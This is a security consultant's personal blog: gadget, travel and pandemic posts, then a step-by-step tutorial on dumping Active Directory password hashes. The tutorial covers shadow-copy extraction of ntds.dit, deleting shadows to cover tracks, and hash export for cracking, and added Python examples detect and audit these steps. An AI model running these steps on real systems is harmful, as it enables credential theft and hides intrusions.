Amcrest – AWC201-B – 1080P WebCam Review

Amcrest reached out to me to test and review their AWC201-B Webcam.

This post contains references to products from one or more of our advertisers. We may receive compensation when you click on links to those products.

Arrived in a super small package, and inside was the camera and a security cover.

TESTING

Plugged the device into a Dell Latitude E7470 running Windows 10 and it was immediately recognized and the drivers were installed.

Tested the webcam on several different platforms to see how the device would work with each one.

  • Microsoft Teams
  • Slack
  • GoToMeeting
  • Zoom

Picture

Overall picture quality is good, there is a fishbowl look at the outer edge of the frame and image looks a little distorted. Color is a little dull looking as well, but if you have good lighting that can be compensated some. Below is how the edge is distorted on the image when shown, it is not super bad and depending on the actual background it is not always visible in the video.

Sound

Microphone on the camera is as expected and anyone who would expect good sound quality from something sitting that far away from you and that small has to be crazy. The sound quality is about what you would expect from something directly sitting on your laptop. It was a little better than what I have in my laptop but overall it made me sound as if I was talking into a tin can and sitting super far away from the microphone.

PROS:

The price is very good compared to several other brands and the overall quality is good for most business meetings and personal usage to make video calls.

CONS:

Camera needs to have a swivel to allow for adjusting the angle of the camera left to right when sitting on top of a laptop. There are some video quality issues but not a show stopper depending on your need.

Outcome

Overall it is a good product for the price, and compared to some well-known brands it works decent enough. Plus as of this writing (2020 Pandemic) they have product in stock, while for companies like Logitech it is near impossible to find any of their products in stock. If you are looking for a decent low priced camera and are not super worried about the overall picture quality this is the webcam for you.

Who is Ready to Travel Again?

I miss traveling, the fun of going new places, seeing new sights, and eating at new restaurants. I get to travel frequently for work, which has its upsides and downsides at times. I am gone a lot, but many times I do get to visit places I like to see and places I have never been before. As well as the perks you can get when you're a frequent traveler with some airlines and hotels.

I am not sure I want to get on a plane right now due to the current pandemic situations, but I sure do miss the excitement of visiting places. I miss staying at new hotels with different amenities to enjoy, as well as scouting out new places to eat.

I prefer to fly Delta as I have Diamond status with them at this current time and they have always treated me well so far. I do fly AA and United when I have to, as Delta does not always go where I need to travel. I used to be a United person but really began to have issues with them several years back and switched up to Delta, and have not had any major issues since in my travels (besides weather related issues). As for AA, they are not that great out of Knoxville Airport (TYS), not sure if it was from the merger with US Airways a few years back or what, but they seem to have the most delays and cancellations from TYS (In my opinion). I always see them on the status boards with Delayed or Canceled, I am sure some of it is due to TYS being a hub for most airlines, but AA seems to have issues very frequently there.

I also prefer to stay at Hilton Hotels, Marriott Hotels and when possible Hyatt Hotels. I have been loyal to Hilton for several years now, but more and more I am staying with Marriott. I made Lifetime Silver with Marriott and am super close to Lifetime Gold (60 Nights needed).

With Hilton I have several more years (5 years to go) to make Lifetime Diamond as they did not count a couple of years I was Diamond with them before they began the program and getting to 1000 nights will take a few more years. I am over halfway there, but when they do not have decent places to stay or they are too expensive to stay at in some areas, I will pick another brand. With Marriott they have a tier system so you can get to a specific status level sooner. I made their Silver Status late last year, and had been slowly working my way up to Gold Status early this year. However, with not traveling as much lately it has slowed my progress a lot.

For car rental companies I am switching it up to who ever gives me the best options. Have been using Hertz lately as I could do grab and go option similar to National.

However, with National it seems unless you have their higher tier status you do not get the nicer cars to drive as often lately. That was not the case when I first started using National, but had begun to change over time. It is not a big issue most of the time, but I do prefer to get something that is comfortable to drive and not a piece of crap. I do like how Hertz has gone to using Clear (when it really works), I noticed it goes a little quicker at the gates to check out when it works.

So all in all with the pandemic I might be changing up some of my travel preferences. I have got the Amex Platinum and Amex Gold cards, and will be looking to downgrade the Amex Delta Reserve card to the free Amex Delta Blue card, as I might be changing up my flying strategy with one airline due to lack of travel and ability to keep status. I am also looking to get the Chase Hyatt card to help keep my Discoverist Status with them, as I might not get to stay at their properties much next year. I already have the Amex Hilton Aspire card and Chase Marriott Bonvoy card to help with earning points during my stays at their properties.

Planning to leverage the Amex Platinum card for booking flights and my Amex Gold card for dining out and groceries, and my specific hotel branded cards for hotel stays. The Amex Platinum gets me Delta Lounge access when flying with Delta, as well as Centurion and Priority Pass lounges where available when flying other carriers. With the Amex points I can transfer to partners to book flights with points and am not tied to one specific airline. I will miss the status from Delta, but not sure I will be getting much past Gold status after next year unless things pick up and we start traveling a lot more. We will see how that goes for 2021, and may switch back to some previous strategies in 2022 if the travel gets back to normal.

Pandemic Updates – June 2020

Well still dealing with the pandemic, and hanging around the house.

Not much has changed for me, still working from home, and having virtual meetings. At least many people I work with have decided to stop using their web cams for every meeting. Well, except the people in my company, they seem to still want you to see them all the time.

Going to the grocery store wearing a mask, and following the directional signage like I was asked to do. Surprising to see how many people cannot follow simple instructions, or are just being asses. It is not that it is that hard to follow simple things, as going one way on aisles, and trying to stay a certain distance from people.

Now we are having protests, riots and looting in a lot of cities, due to a police officer(s) that killed a black/African American gentleman named George Floyd. It is interesting the way this has taken off and the amount of people that are involved in some of the protests, and discussions surrounding the police and brutality against people. However, I think some are just trying to get a few minutes of attention and are not entirely involved with the intent of the protests. There also seem to be some that are using it for other purposes, and to try to cause havoc, those are the ones who are looting stores and damaging property. It is bad when I hear more on the riots and looting in the news, and less about the actual protests and information on the case against the police officer(s).

Now there seems to be more cases of RONA happening lately, most seem to be from the memorial day holiday weekend and people wanting to get out of the house for some fun and enjoyment. Now we might see a larger increase from the protests, and I hope we don’t go backwards on the stay at home orders. Things were just starting to open back up and people were starting to be allowed to get haircuts, eat at an actual restaurant, and get out to the parks and other places.

The Stock markets cannot decide what they want to do and the US feds are not helping much. People are demanding a second stimulus check, some people don’t want to go back to work as they are making more on unemployment than what they were getting paid. Stocks rose when they announced that unemployment was lower than expected for May. Then it started crashing again after a non-informative briefing from the US Feds.

All I can say is stay safe, stay healthy, and look out for yourself and family. Do what feels right for you and your family, if you can stay home, then do that. If you have to go to an office to work, stay away from the crazies who think nothing is going on, and it is all a hoax.

Pandemic Updates – Staying at home for the greater Good!

So, we are still hanging out at home due to the COVID-19 Pandemic. Things have changed only a little for me during this time, I am still working, just now at home more often. I was used to traveling to clients' sites almost every other week, and now I am doing everything remotely for the most part.

Having meetings via Teams, Webex, and even Zoom has been interesting, especially with all the people who are not used to working remotely. With people demanding everyone use their webcams in meetings we get to see some interesting things, like people’s homes, their family members, and even their pets. This was not a normal thing that would happen several weeks ago on a virtual meeting. Several of the platforms are now allowing for virtual backgrounds, which gives people something to show other than their homes (messy or not).

Been reading some articles from several people (not sure what makes them an expert on this subject) on Twitter and in news articles who want to tell me how to work from home and how I should act in my virtual meetings. I think that giving people a list of things that work well for you in your remote job is stupid, as not everyone is the same or wants to do the same things as you. I have no problems with listing out things to try, and let the person decide what works best for them, but stop telling people how to work remotely. Also, telling people to not mute their microphones during meetings so they can have better interactions with their team is ridiculous as no one would ever get anything accomplished. All you would probably hear is people breathing, eating, typing and other background noises, making the meeting useless and take forever to get to what the meeting was intended to cover. People will figure out the flow, just let them work on it, as every meeting has a different focus and drive based on the purpose. Plus half of the people are chatting with each other in the background about most of the topics being discussed.

That cozy work environment we all love

Not everyone is geared to do remote work, and many people like to have that little interaction with an actual person in their work day. Some may even take a little more time to find their groove in this process and it will be a trial for several weeks to get it to their groove. Some people need a routine to get through their day, while others will just wing it every day. Whichever scenario works for you, just keep dealing with it and keep at it. For the people who are like “see now they (their employer) have no reason to not let us work remote going forward”, you may have to keep dreaming, as it is not that easy for every company to make that an easy decision. Be happy you have an option to work remote, not everyone has that as an option.

We have the people who were terminated or furloughed as the business could not continue making payroll. Then there are the people who are currently identified as essential (Medical staff, grocery store staff and food service staff) and then there is everyone else either working remote or sitting idle collecting some paycheck (either a full or partial payment) waiting for things to start moving again.

What is normal?

Will everything go back to normal? Well you need to define what normal is to start that discussion. I do not believe everything will go back to the way it was before the pandemic, I do see some changes that will last for several years if not permanently. People may get to work remote for some time before getting asked to come back into the office. I do not see that everyone will be required to come back all at once, it will be the people who want to or are able to come into the office to work. Some may not want to come back at first but want the comfort of working at the office with their colleagues. Others will stay remote for as long as they are allowed to, some may be told to come back to the office, while others may be allowed to make that a choice to stay a remote worker. Some people's positions will be eliminated as there will not be a need for them due to less work overall, less money coming in to support the staff, and possibly the business not getting back to pre-pandemic operations.

Wishing to be heading somewhere nice

Traveling will take a while to get back to any type of normalcy and some airlines may not continue with or may limit some flights to certain cities (less profitable locations). Business travel will change for many, as it will not be justified to fly out to do those meetings onsite. Sales people may not be able to get in to meet the people they are trying to sell products to. For many if it can be done remote, then that would be the preferred option, instead of the expense of traveling and the possibility of someone getting sick.

Vacation travel may take a big hit, some will be due to fear of traveling again, and some will be due to financial limitations from layoffs and people having less money. People may just do more driving to nearby areas that are less crowded, and less people flying on crowded planes to large populated areas. Cruising may have some less crowded ships, but not sure if that will be just older people and some families with kids, or if it will be across the board for people. Have read that cruise lines have seen an uptick in people booking trips for 2021, but I think it is people playing the game, and are hoping for a cancellation to get an extra credit fees to book a future trip or are taking the current credits they got for canceled trips to hold their place on the next ship.

Who knows what the future will bring, I guess we will find out in the next coming months. One thing I can say is I hope people stop being stupid about this whole situation. Yes it sucks, and maybe could have been handled a lot better by the people in government. But if we all work together we will get through this sooner than later.

New work uniforms if we are not careful

Quarantined during the Pandemic

Well we have a full blown pandemic across the world due to the Novel Coronavirus (COVID-19); the first cases of this virus started in December of 2019 in Wuhan, Hubei, China. The World Health Organization declared it a pandemic on March 11, 2020.

People are being forced to self quarantine as employers are going to a work from home model due to pressures to distance people from each other. Many people are happy that they actually get to work from home, while others are not overly ready or prepared to do work from home. It is funny to see all the Twitter posts on how to work from home, and what you need to do. Some make sense and others are just someone's personal preferences. Figure out what works best for you, and try different things at first until it works best for you.

My Work From home:

  • Set a schedule (Wake up the same time every day)
  • Get ready for the day (Get out of your PJ’s and take a shower)
  • Have a separate place to work (My Desk is in my bedroom at the current time)
  • Dedicated work area (My standup desk in a corner of my bedroom)
  • Quiet area for conference calls (No pets, kids, or TV’s)
  • Take breaks (Get away from things – walk outside, step away for 10 to 15 minutes)
  • Plan lunch breaks (Meet people, just get out of the house, actually take a break)
  • Have an end of the day (when does the work day end for you?)

Working from home is not for everyone, no matter what I hear on Twitter. Yes it sounds great for many people to be allowed to work from their house and not to have to drive into an office. While it sounds great to just roll out of bed and be at work, that is not always the case. For those that have kids at home and no real office to separate yourself away from everyone else, it is hard to not get distracted. If you do not have a headset with noise canceling microphone, the background noise will be heard by everyone and very distracting. Telling yourself you can multi-task, just stop lying to yourself. You are just doing more than one thing half paying attention to one or both of them most of the time.

If it was not for me traveling frequently, working from home would get really boring and monotonous. I like to interact with people, not that I do not like to talk to my wife and kids, but they do not know anything about what I do for work or any of my hobbies. For some people who like to be alone and only want to see their family, that is good if you can work from home, but this is not for everyone.

So, if you're getting to work from home or looking to get a job that allows you to work from home, make sure it will work for you, it is not for everyone all the time.

Some see perceived benefits:

  • No longer have a commute
    • Save on gas not commuting (maybe)
    • Save time not commuting (maybe)
  • Get to stay home with spouse/pets/kids
    • More quality time with family
    • Kids will not have to go to daycare/babysitter
  • Have more time (not sure on this one)
    • Able to take care of personal things
    • Dr appointments when I want to go
    • Go to the store when I want

If you get the opportunity to work from home get a plan to continue to show your value to your manager, otherwise you may have to go back to the office. The reason why many people do not get the opportunity to work from home is due to some slacker who could not handle it. Yes, your manager will believe you are not doing anything as they never see you. This could also impact promotions, as when you're not seen you tend to become invisible to people. Keep in contact with co-workers, your manager and show you can be productive no matter where you are.

Traveling to NC way too often.

Have been traveling to Mooresville, NC for work for about eleven months now (started in Feb 2019), it is getting a little tiring to visit the same place every week. I fly out on Monday and home on Friday almost every week. To me it is just far enough I do not want to drive the four+ hours one way, especially when I have meetings to go to as soon as I get in on Monday.
 
I have visited a large majority of restaurants in Mooresville, Davidson and surrounding areas, since I have been visiting the area. I was surprised to not be able to find a place to get fried chicken though, well except for the chain places.
 

Places in Mooresville NC:
I have tried several barbecue joints, and have been pleasantly surprised at the food. There is a place called Big Tiny’s that is a Texas style barbecue with some great banana pudding and Shiner Bock in bottles. Another place is called Lancaster’s which is an East North Carolina barbecue with plenty of NASCAR memorabilia all over the place, wings are good as well as the BBQ pork and a decent banana pudding as well.

Have tried Epic Chophouse, which I have visited several times and the food is always excellent. They have several menu items I have loved, one being the Smokin’ Hot Couple and the other is the Mixed Grill. Of course the steaks are great and they have a very good bar with many options on wines and beers. They are known for their desserts as well, which having tried a couple I can say they are great, have heard they are from a local bakery in town. This is my usual go to place when someone I know is coming onsite to visit and says let's do dinner. They require everyone to dress reasonably and men’s shirts must have sleeves. Almost every time I have been there it is packed but have not had an issue getting a table or finding a place in the bar area.

 

Places in Cornelius NC: 
131 Main, which I guess technically is a chain, but they only have four locations three in the Charlotte area and one in Asheville NC. Have only been once, but the food looks great, I tried the Southern Shrimp and Grits and had appetizers of Deviled Eggs and Cast Iron Cornbread. Everything was excellent and I was so stuffed I could not try dessert.

Places in Davidson NC:
Kindred is a great place to eat and is usually packed. Have been several times and have never had anything that was not excellent. The menu is seasonally driven and is different every day.
Flatiron Kitchen + Taproom, have been about six times here, and the food is always excellent, and the beer and wine selection is great.
Mestizo is a Contemporary Mexican restaurant, it is fairly small but has a nice outdoor patio with a view of the downtown area.

Starting off 2017 right! (I hope…..)

Well it's 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and multiple ROCs due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss, hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like, miss the interactions with other people. Not that I do not like my family, it's just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with what's going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. First one is an ISO 27001 Lead Auditor certification course. I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if there was space I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes, certifications never hurt anyone.

So it looks like my first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice to get to learn their methodology, and show my manager I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do, I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable to be a senior consultant, but if I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, let's hope things keep rolling along smoothly…..

Starting a new Job

I have left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them are related to one individual that has moved up the ranks in the company. He was originally hired to do report reviews five years back, and is now the Senior VP of services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP and COO do not even notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone, and usually get a hello back from whomever is there. Not lately; had multiple encounters with the C suite and they literally walk past me as if I was not there.
I wish all my former colleagues well in their endeavors and hope things get better.

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customer's doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My boss's boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.

Get ntds.dit and SYSTEM from Volume Shadow Copy on Host

Luckily Windows has built-in tools to assist with collecting the files needed.

Vssadmin tool

List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy path looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
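
Seen from the defender's side, every step above leaves a process command line that can be matched. The following is an added example, not code from the original post or from any tool it mentions: it classifies command lines (as captured by process-creation logging) into the steps of this procedure and grades each host. The event records, field names, host names and user names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One pattern per step of the procedure described in this post.
RULES = {
    "shadow_create": re.compile(r'\bvssadmin(?:\.exe)?\b.*\bcreate\s+shadow\b', re.I),
    "shadow_delete": re.compile(r'\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b', re.I),
    # ntds.dit or a registry hive file read through a shadow-copy device path
    "shadow_read": re.compile(
        r'HarddiskVolumeShadowCopy\d+\\\S*?'
        r'(?:ntds\.dit|\\config\\(?:SYSTEM|SAM|SECURITY))(?=["\s]|$)', re.I),
    # reg save of a whole credential-bearing hive (a subkey does not match)
    "hive_save": re.compile(
        r'\breg(?:\.exe)?\s+save\s+(?:HKLM|HKEY_LOCAL_MACHINE)\\'
        r'(?:SYSTEM|SAM|SECURITY)(?=["\s]|$)', re.I),
}
ACCESS = {"shadow_read", "hive_save"}  # steps that touch credential material


def classify(command_line):
    """Return the names of every step whose pattern matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def correlate(events, window=timedelta(minutes=30)):
    """Grade each host: 'high' when a credential-store access follows a
    shadow-copy creation within `window`, 'medium' for an access on its own."""
    per_host = defaultdict(list)
    for ev in events:
        when = datetime.fromisoformat(ev["time"])
        for stage in classify(ev["command_line"]):
            per_host[ev["host"]].append((when, stage, ev["user"]))

    findings = {}
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        access = [h for h in hits if h[1] in ACCESS]
        if not access:
            continue  # creating or deleting shadows alone is routine backup activity
        creates = [t for t, stage, _ in hits if stage == "shadow_create"]
        deletes = [t for t, stage, _ in hits if stage == "shadow_delete"]
        chained = any(timedelta(0) <= a[0] - c <= window
                      for a in access for c in creates)
        findings[host] = {
            "severity": "high" if chained else "medium",
            "stages": [stage for _, stage, _ in hits],
            "users": sorted({user for _, _, user in access}),
            # shadow deletion after the first access suggests clean-up
            "cleanup": any(d >= access[0][0] for d in deletes),
        }
    return findings


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"host": "DC01", "user": r"CORP\admin1", "time": "2020-06-01T10:00:00",
     "command_line": r"vssadmin create shadow /for=C:"},
    {"host": "DC01", "user": r"CORP\admin1", "time": "2020-06-01T10:01:00",
     "command_line": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ."},
    {"host": "DC01", "user": r"CORP\admin1", "time": "2020-06-01T10:01:20",
     "command_line": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM ."},
    {"host": "DC01", "user": r"CORP\admin1", "time": "2020-06-01T10:02:00",
     "command_line": r"reg SAVE HKLM\SYSTEM c:\SYS"},
    {"host": "DC01", "user": r"CORP\admin1", "time": "2020-06-01T10:05:00",
     "command_line": r"vssadmin delete shadows /for=C: /shadow={SHADOW-ID}"},
    # Backup job: shadow copy plus ordinary file reads, no credential stores
    {"host": "FS02", "user": r"CORP\svc-backup", "time": "2020-06-01T02:00:00",
     "command_line": r"vssadmin create shadow /for=D:"},
    {"host": "FS02", "user": r"CORP\svc-backup", "time": "2020-06-01T02:00:30",
     "command_line": r"robocopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Shares\Finance E:\backup /E"},
    # Hive save with no shadow copy involved
    {"host": "WS07", "user": r"CORP\jdoe", "time": "2020-06-01T15:30:00",
     "command_line": r"reg save HKLM\SYSTEM C:\Temp\s.hiv"},
]

if __name__ == "__main__":
    for host, finding in correlate(SAMPLE_EVENTS).items():
        print(host, finding)
```
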
Now that you have the files, it is time to get the hashes
Utilities needed:

  • libesedb
  • ntdsxtract

libesedb

Download libesedb: (Use whichever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
                   [ -T table_name ] [ -hvV ] source

    source: the source file

    -c: codepage of ASCII strings, options: ascii, windows-874,
        windows-932, windows-936, windows-1250, windows-1251,
        windows-1252 (default), windows-1253, windows-1254
        windows-1255, windows-1256, windows-1257 or windows-1258
    -h: shows this help
    -l: logs information about the exported items
    -m: export mode, option: all, tables (default)
        'all' exports all the tables or a single specified table with indexes,
        'tables' exports all the tables or a single specified table
    -t: specify the basename of the target directory to export to
        (default is the source filename) esedbexport will add the suffix
        .export to the basename
    -T: exports only a specific table
    -v: verbose output to stderr
    -V: print version

Running esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py:
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes returned varies with the domain's password history setting)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need, it is time to start cracking passwords to get to that data you wanted…
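The per-user records that dsusers.py prints (see the example output above) are also useful for a password-hygiene audit. The following is an added example, not part of the original post or of NTDSXtract: it parses that text layout and flags accounts with an old password or a stored LM hash, without keeping any hash value. The function names, the 365-day threshold and the sample records are assumptions made for illustration.

```python
import re
from datetime import datetime

# Constructed sample in the record layout shown above; hash values are redacted placeholders.
SAMPLE = """\
Record ID: 32777
SAM Account name: name
Password last set: 2013-10-07 13:20:19.146593
Password hashes:
name:$NT$<redacted>:::
name:<redacted>:::
Record ID: 32778
SAM Account name: svc_backup
Password last set: 2009-03-02 08:00:00
Password hashes:
svc_backup:$NT$<redacted>:::
"""

def parse_ts(value):  # returns None for "Never" or any unparsable value
    for fmt in ("%Y-%m-%d %H:%M:%S.%f", "%Y-%m-%d %H:%M:%S"):
        try:
            return datetime.strptime(value.strip(), fmt)
        except ValueError:
            continue
    return None

def parse_records(text):
    records = []
    for block in text.split("Record ID:")[1:]:
        # "Key: value" lines only; hash lines have no space after the colon.
        fields = dict(re.findall(r"(?m)^([^:\n]+): (.+)$", block))
        # Only note whether hash lines exist; the values are never kept.
        tail = block.partition("Password hashes:")[2].splitlines()
        hash_lines = [l for l in tail if l.strip().endswith(":::")]
        records.append({
            "sam": fields.get("SAM Account name"),
            "pwd_last_set": parse_ts(fields.get("Password last set", "")),
            # Assumption: in john format the NT line carries the $NT$ tag, the LM line does not.
            "lm_hash_stored": any("$NT$" not in l for l in hash_lines),
        })
    return records

def audit(records, as_of, max_age_days=365):
    findings = []
    for r in records:
        if r["pwd_last_set"] and (as_of - r["pwd_last_set"]).days > max_age_days:
            findings.append((r["sam"], "stale_password"))
        if r["lm_hash_stored"]:
            findings.append((r["sam"], "lm_hash_stored"))
    return findings
```

Calling audit(parse_records(text), datetime(2015, 4, 22)) on saved dsusers.py output returns (account, issue) pairs that can go straight into a remediation list.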